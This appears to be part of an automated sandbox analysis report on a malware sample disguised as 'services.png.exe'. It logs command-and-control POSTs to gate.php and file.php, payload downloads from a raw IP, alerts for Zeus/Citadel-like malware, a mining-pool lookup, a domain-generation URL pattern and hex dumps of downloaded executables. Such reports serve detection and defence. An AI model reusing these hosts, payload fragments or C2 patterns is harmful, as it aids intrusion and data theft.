30 8d d3 c0 81 38 94 07 68 1f 90 7a f9 3b 19 47 a2 f1 45 62 54 f3 73
                        Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 31 Jan 2025 10:02:23 GMTServer: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40Last-Modified: Wed, 13 Dec 2023 16:20:48 GMTETag: "547e00-60c668cc23800"Accept-Ranges: bytesContent-Length: 5537280Connection: closeContent-Type: application/x-msdownloadData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 68 72 ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 64 86 08 00 d0 d9 79 65 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0e 00 00 68 01 00 00 12 53 00 00 00 00 00 40 11 00 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 30 55 00 00 04 00 00 00 00 00 00 02 00 60 81 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 80 d5 01 00 3c 00 00 00 00 10 55 00 50 03 00 00 00 e0 54 00 a4 01 00 00 00 00 00 00 00 00 00 00 00 20 55 00 78 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 80 01 00 28 00 00 00 10 84 01 00 38 01 00 00 00 00 00 00 00 00 00 00 38 d7 01 00 78 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 d6 66 01 00 00 10 00 00 00 68 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 88 5d 00 00 00 80 01 00 00 5e 00 00 00 6c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 38 f2 52 00 00 e0 01 00 00 a8 52 00 00 ca 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 a4 01 00 00 00 e0 54 00 00 02 00 00 00 72 54 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 30 30 63 66 67 00 00 10 00 00 00 00 f0 54 00 00 02 00 00 00 74 54 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 10 00 00 00 00 00 55 00 00 02 00 00 00 76 54 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 50 03 00 00 00 10 55 00 00 04 00 00 00 78 54 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 78 00 00 00 00 20 55 00 00 02 00 00 00 7c 54 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                        Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 31 Jan 2025 10:02:30 GMTServer: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40Last-Modified: Fri, 27 Dec 2024 18:27:01 GMTETag: "4479-62a449be39780"Accept-Ranges: bytesContent-Length: 17529Connection: closeContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 e3 34 f9 43 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 02 32 00 30 00 00 00 20 00 00 00 90 00 00 80 ca 00 00 00 a0 00 00 00 d0 00 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 f0 00 00 00 10 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 1c e3 00 00 78 01 00 00 00 d0 00 00 1c 13 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 50 58 30 00 00 00 00 00 90 00 00 00 10 00 00 00 00 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 e0 55 50 58 31 00 00 00 00 00 30 00 00 00 a0 00 00 00 2c 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 00 20 00 00 00 d0 00 00 00 16 00 00 00 2e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 31 2e 32 35 00 55 50 58 21 0c 09 02 0a 1c 91 4f 1d 95 4a d1 4f 1f a8 00 00 69 2a 00 00 00 76 00 00 26 01 00 49 fd 7f 7b e5 68 68 00 03 04 70 7d 40 00 e8 01 00 20 be 83 c4 0c ba 67 6e 8f 11 e8 af 52 16 a3 74 0e 04 10 bf c7 ce 77 18 9c 2f 24 50 00 34 49 27 fb db 6c 76 04 34 8e 28 a3 27 ec 48 ec 68 01 36 b9 fd 3d ec d0 40 8b 15 0a e8 89 8f 4c b8 00 f6 bd d9 9e 1e 0e 9a ff 35 a4 7f 24 01 4c 76 de 75 3f 23 cc 8d 0d a8 29 5a 0b 1f fc ff 35 1b b3 f7 cc 77 2a 77 b4 30 05 0b 6c c9 b2 7b 20 37 0d 26 a0 53 65 0f 7b 81 15 37 dc 51 53 95 4c 85 1c a4 8e b2 ec 42 32 9c 16 15 8b 98 b2 85 bd 57 0b ca 65 16 4a 64 43 92 ed d4 1c 94 2f 17 c3 5e ec 9d 1b ff 00 0f 4a 78 a3 7c 7b 05 dc ff 6d fe 0f ac a3 88 8b 1d 91 21 db 0f 84 79 06 00 0d c1 4e f6 ff 13 83 c3 fb 89 d8 99 52 50 2b 4b 3c ef d8 fb 06 c8 03 00 15 a1 0f 31 97 bd 80 0d 8c f5 20 a9 24 f7 ef ed ef 1c ff 05 15 ba 0c 70 04 59 89 0d 0b 03 0d 50 71 1c 45 7e 6f 6d 98 8e 27 88 ec 05 00 42 18 7f c8 f7 93 9d 09 b8 aa c1 f3 08 03 1d 0e 89 17 d8 c2 de a1 04 ab 8f 89 32 14 e6 fe c3 83 fb 03 0f 85 8b 5c 95 02 10 7b b2 37 4e 38 4e ec a3 8c 91 ed 9e b1 9d 2e f9 8b 90 db 80 bf 1d 08 ce ff b3 2f 97 77 ec 89 d7 a1 88 a4 83 04 24 f9 83 54 24 04 ed d3 ff ff ff 58 5a 39 d7 7c 0
                        Source: Joe Sandbox ViewIP Address: 173.222.162.51 173.222.162.51
                        Source: Joe Sandbox ViewIP Address: 173.222.162.32 173.222.162.32
                        Source: Joe Sandbox ViewASN Name: DE-FIRSTCOLOwwwfirst-colonetDE DE-FIRSTCOLOwwwfirst-colonetDE
                        Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                        Source: unknownDNS query: name: icanhazip.com
                        Source: Network trafficSuricata IDS: 2001046 - Severity 3 - ET MALWARE UPX compressed file download possible malware : 51.21.41.165:5555 -> 192.168.2.4:49952
                        Source: Network trafficSuricata IDS: 2016172 - Severity 2 - ET MALWARE Generic -POST To file.php w/Extended ASCII Characters : 192.168.2.4:49739 -> 212.224.93.93:443
                        Source: Network trafficSuricata IDS: 2016172 - Severity 2 - ET MALWARE Generic -POST To file.php w/Extended ASCII Characters : 192.168.2.4:49741 -> 212.224.93.93:443
                        Source: Network trafficSuricata IDS: 2016742 - Severity 1 - ET MALWARE Possible W32/Citadel Download From CnC Server Self Referenced /files/ attachment : 212.224.93.93:443 -> 192.168.2.4:49739
                        Source: Network trafficSuricata IDS: 2016742 - Severity 1 - ET MALWARE Possible W32/Citadel Download From CnC Server Self Referenced /files/ attachment : 212.224.93.93:443 -> 192.168.2.4:49741
                        Source: Network trafficSuricata IDS: 2016742 - Severity 1 - ET MALWARE Possible W32/Citadel Download From CnC Server Self Referenced /files/ attachment : 212.224.93.93:443 -> 192.168.2.4:49743
                        Source: Network trafficSuricata IDS: 2016742 - Severity 1 - ET MALWARE Possible W32/Citadel Download From CnC Server Self Referenced /files/ attachment : 212.224.93.93:443 -> 192.168.2.4:49740
                        Source: Network trafficSuricata IDS: 2016742 - Severity 1 - ET MALWARE Possible W32/Citadel Download From CnC Server Self Referenced /files/ attachment : 212.224.93.93:443 -> 192.168.2.4:49742
                        Source: Network trafficSuricata IDS: 2016173 - Severity 2 - ET MALWARE Generic -POST To gate.php w/Extended ASCII Characters (Likely Zeus Derivative) : 192.168.2.4:49958 -> 212.224.93.93:443
                        Source: Network trafficSuricata IDS: 2016173 - Severity 2 - ET MALWARE Generic -POST To gate.php w/Extended ASCII Characters (Likely Zeus Derivative) : 192.168.2.4:49886 -> 212.224.93.93:443
                        Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49987 -> 149.154.167.220:443
                        Source: global trafficHTTP traffic detected: POST /file.php HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: saba.royalreturns.orgContent-Length: 130Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST /file.php HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: saba.royalreturns.orgContent-Length: 142Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST /file.php HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: saba.royalreturns.orgContent-Length: 145Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST /file.php HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: saba.royalreturns.orgContent-Length: 145Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST /file.php HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: saba.royalreturns.orgContent-Length: 141Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: saba.royalreturns.orgContent-Length: 548Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /webhp?gws_rd=ssl HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Cache-Control: no-cacheHost: www.google.comConnection: CloseCookie: AEC=AVcja2fZ5WoToRr8N0EKwXEQHhpU0b7fMrW843GyTClJXu_gwVa_4Pyv2w; NID=521=ghRckTstDGUFWLLeGG59dPxXLE5arcREGZ79_4NQ9dnMJUjGl2efELGFvPE8r53aIGZ9-m7D1otiKeeMO4NAmx9vJv_XceVM4ed_sLcgqM8jkysPWnq03BiDjW41P4JdGFGTI8o9RNbzQtedai-JTyBLx9iGgp5FQKMaiLtWnKU_6QcwgAv-PutmFhhN7cDd4lW0TeQdfH1jJ2Y
                        Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: saba.royalreturns.orgContent-Length: 1055Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: saba.royalreturns.orgContent-Length: 438Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: saba.royalreturns.orgContent-Length: 561Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: saba.royalreturns.orgContent-Length: 570Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: saba.royalreturns.orgContent-Length: 279Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: saba.royalreturns.orgContent-Length: 279Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: saba.royalreturns.orgContent-Length: 279Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /webhp HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.google.comConnection: CloseCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /UIServices.exe HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 51.21.41.165:5555Connection: CloseCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /smbhost.exe HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 51.21.41.165:5555Connection: CloseCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /SearchUI.exe HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 51.21.41.165:5555Connection: CloseCache-Control: no-cache
                        Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
                        Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.51
                        Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
                        Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.51
                        Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
                        Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.51
                        Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
                        Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.51
                        Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
                        Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.51
                        Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
                        Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.51
                        Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
                        Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.51
                        Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
                        Source: unknownTCP traffic detected without corresponding DNS query: 51.21.41.165
                        Source: unknownTCP traffic detected without corresponding DNS query: 51.21.41.165
                        Source: unknownTCP traffic detected without corresponding DNS query: 51.21.41.165
                        Source: unknownTCP traffic detected without corresponding DNS query: 51.21.41.165
                        Source: unknownTCP traffic detected without corresponding DNS query: 51.21.41.165
                        Source: unknownTCP traffic detected without corresponding DNS query: 51.21.41.165
                        Source: unknownTCP traffic detected without corresponding DNS query: 51.21.41.165
                        Source: unknownTCP traffic detected without corresponding DNS query: 51.21.41.165
                        Source: unknownTCP traffic detected without corresponding DNS query: 51.21.41.165
                        Source: unknownTCP traffic detected without corresponding DNS query: 51.21.41.165
                        Source: unknownTCP traffic detected without corresponding DNS query: 51.21.41.165
                        Source: unknownTCP traffic detected without corresponding DNS query: 51.21.41.165
                        Source: unknownTCP traffic detected without corresponding DNS query: 51.21.41.165
                        Source: unknownTCP traffic detected without corresponding DNS query: 51.21.41.165
                        Source: unknownTCP traffic detected without corresponding DNS query: 51.21.41.165
                        Source: unknownTCP traffic detected without corresponding DNS query: 51.21.41.165
                        Source: unknownTCP traffic detected without corresponding DNS query: 51.21.41.165
                        Source: unknownTCP traffic detected without corresponding DNS query: 51.21.41.165
                        Source: unknownTCP traffic detected without corresponding DNS query: 51.21.41.165
                        Source: unknownTCP traffic detected without corresponding DNS query: 51.21.41.165
                        Source: unknownTCP traffic detected without corresponding DNS query: 51.21.41.165
                        Source: unknownTCP traffic detected without corresponding DNS query: 51.21.41.165
                        Source: unknownTCP traffic detected without corresponding DNS query: 51.21.41.165
                        Source: unknownTCP traffic detected without corresponding DNS query: 51.21.41.165
                        Source: unknownTCP traffic detected without corresponding DNS query: 51.21.41.165
                        Source: unknownTCP traffic detected without corresponding DNS query: 51.21.41.165
                        Source: unknownTCP traffic detected without corresponding DNS query: 51.21.41.165
                        Source: unknownTCP traffic detected without corresponding DNS query: 51.21.41.165
                        Source: unknownTCP traffic detected without corresponding DNS query: 51.21.41.165
                        Source: unknownTCP traffic detected without corresponding DNS query: 51.21.41.165
                        Source: unknownTCP traffic detected without corresponding DNS query: 51.21.41.165
                        Source: unknownTCP traffic detected without corresponding DNS query: 51.21.41.165
                        Source: unknownTCP traffic detected without corresponding DNS query: 51.21.41.165
                        Source: unknownTCP traffic detected without corresponding DNS query: 51.21.41.165
                        Source: unknownTCP traffic detected without corresponding DNS query: 51.21.41.165
                        Source: C:\Users\user\Desktop\services.png.exeCode function: 0_2_00425010 getaddrinfo,freeaddrinfo,getsockname,getpeername,recv,recvfrom,getaddrinfo,freeaddrinfo,sendto,recvfrom,sendto,select,0_2_00425010
                        Source: global trafficHTTP traffic detected: GET /webhp?gws_rd=ssl HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Cache-Control: no-cacheHost: www.google.comConnection: CloseCookie: AEC=AVcja2fZ5WoToRr8N0EKwXEQHhpU0b7fMrW843GyTClJXu_gwVa_4Pyv2w; NID=521=ghRckTstDGUFWLLeGG59dPxXLE5arcREGZ79_4NQ9dnMJUjGl2efELGFvPE8r53aIGZ9-m7D1otiKeeMO4NAmx9vJv_XceVM4ed_sLcgqM8jkysPWnq03BiDjW41P4JdGFGTI8o9RNbzQtedai-JTyBLx9iGgp5FQKMaiLtWnKU_6QcwgAv-PutmFhhN7cDd4lW0TeQdfH1jJ2Y
                        Source: global trafficHTTP traffic detected: GET /webhp HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.google.comConnection: CloseCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /UIServices.exe HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 51.21.41.165:5555Connection: CloseCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /smbhost.exe HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 51.21.41.165:5555Connection: CloseCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /SearchUI.exe HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 51.21.41.165:5555Connection: CloseCache-Control: no-cache
                        Source: global trafficDNS traffic detected: DNS query: saba.royalreturns.org
                        Source: global trafficDNS traffic detected: DNS query: www.google.com
                        Source: global trafficDNS traffic detected: DNS query: 159.228.9.0.in-addr.arpa
                        Source: global trafficDNS traffic detected: DNS query: icanhazip.com
                        Source: global trafficDNS traffic detected: DNS query: api.mylnikov.org
                        Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                        Source: global trafficDNS traffic detected: DNS query: ghostrider.mine.zergpool.com
                        Source: global trafficDNS traffic detected: DNS query: rentry.co
                        Source: global trafficDNS traffic detected: DNS query: xm.centralmarketingkur.com
                        Source: unknownHTTP traffic detected: POST /file.php HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: saba.royalreturns.orgContent-Length: 130Connection: Keep-AliveCache-Control: no-cache
                        Source: services.png.exe, services.png.exe, 00000000.00000002.2171781778.0000000002B50000.00000004.00000020.00020000.00000000.sdmp, services.png.exe, 00000000.00000002.2171239086.0000000002810000.00000040.00000400.00020000.00000000.sdmp, services.png.exe, 00000000.00000002.2167883548.0000000000401000.00000020.00000001.01000000.00000003.sdmp, nyheukpo.exe, nyheukpo.exe, 00000001.00000003.2766629012.00000000040FC000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000003.2579296491.00000000040FC000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000002.2922936744.0000000000401000.00000020.00000001.01000000.00000006.sdmp, nyheukpo.exe, 00000001.00000003.2282267263.00000000040FC000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000003.2627357615.00000000040FC000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000003.1732075330.0000000002221000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000003.2745411292.00000000040FC000.00000004.00000020.00020000.00000000.sdmp, sihost.exe, 00000002.00000003.1732150846.0000000000AC0000.00000040.00000001.00020000.00000000.sdmp, sihost.exe, 00000002.00000000.1730300340.0000000000AC0000.00000040.00000001.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1733775300.0000000000910000.00000040.00000001.00020000.00000000.sdmp, svchost.exe, 00000003.00000000.1732249367.0000000000910000.00000040.00000001.00020000.00000000.sdmp, svchost.exe, 00000004.00000003.1736960492.00000000009A0000.00000040.00000001.00020000.00000000.sdmp, svchost.exe, 00000004.00000000.1733891566.00000000009A0000.00000040.00000001.00020000.00000000.sdmp, ctfmon.exe, 00000005.00000000.1737083449.0000000000A50000.00000040.00000001.00020000.00000000.sdmp, ctfmon.exe, 00000005.00000003.1738779911.0000000000A50000.00000040.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.1762790225.000000000C350000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: http://%02x%02x%02x%02x%02x%02x%02x%02x.com/%02x%02x%02x%02x/%02x%02x%02x%02x.php
                        Source: services.png.exe, 00000000.00000002.2171781778.0000000002B50000.00000004.00000020.00020000.00000000.sdmp, services.png.exe, 00000000.00000002.2171239086.0000000002810000.00000040.00000400.00020000.00000000.sdmp, services.png.exe, 00000000.00000002.2167883548.0000000000401000.00000020.00000001.01000000.00000003.sdmp, nyheukpo.exe, 00000001.00000003.2766629012.00000000040FC000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000003.2579296491.00000000040FC000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000002.2922936744.0000000000401000.00000020.00000001.01000000.00000006.sdmp, nyheukpo.exe, 00000001.00000003.2282267263.00000000040FC000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000003.2627357615.00000000040FC000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000003.1732075330.0000000002221000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000003.2745411292.00000000040FC000.00000004.00000020.00020000.00000000.sdmp, sihost.exe, 00000002.00000003.1732150846.0000000000AC0000.00000040.00000001.00020000.00000000.sdmp, sihost.exe, 00000002.00000000.1730300340.0000000000AC0000.00000040.00000001.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1733775300.0000000000910000.00000040.00000001.00020000.00000000.sdmp, svchost.exe, 00000003.00000000.1732249367.0000000000910000.00000040.00000001.00020000.00000000.sdmp, svchost.exe, 00000004.00000003.1736960492.00000000009A0000.00000040.00000001.00020000.00000000.sdmp, svchost.exe, 00000004.00000000.1733891566.00000000009A0000.00000040.00000001.00020000.00000000.sdmp, ctfmon.exe, 00000005.00000000.1737083449.0000000000A50000.00000040.00000001.00020000.00000000.sdmp, ctfmon.exe, 00000005.00000003.1738779911.0000000000A50000.00000040.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.1762790225.000000000C350000.00000040.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1754241470.000000000C350000.00000040.00000001.00020000.00000000.sdmp, svchost.exe, 00000007.00000000.1762934350.0000000000D40000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: http://%02x%02x%02x%02x%02x%02x%02x%02x.com/%02x%02x%02x%02x/%02x%02x%02x%02x.phpfileipfilewww.www.
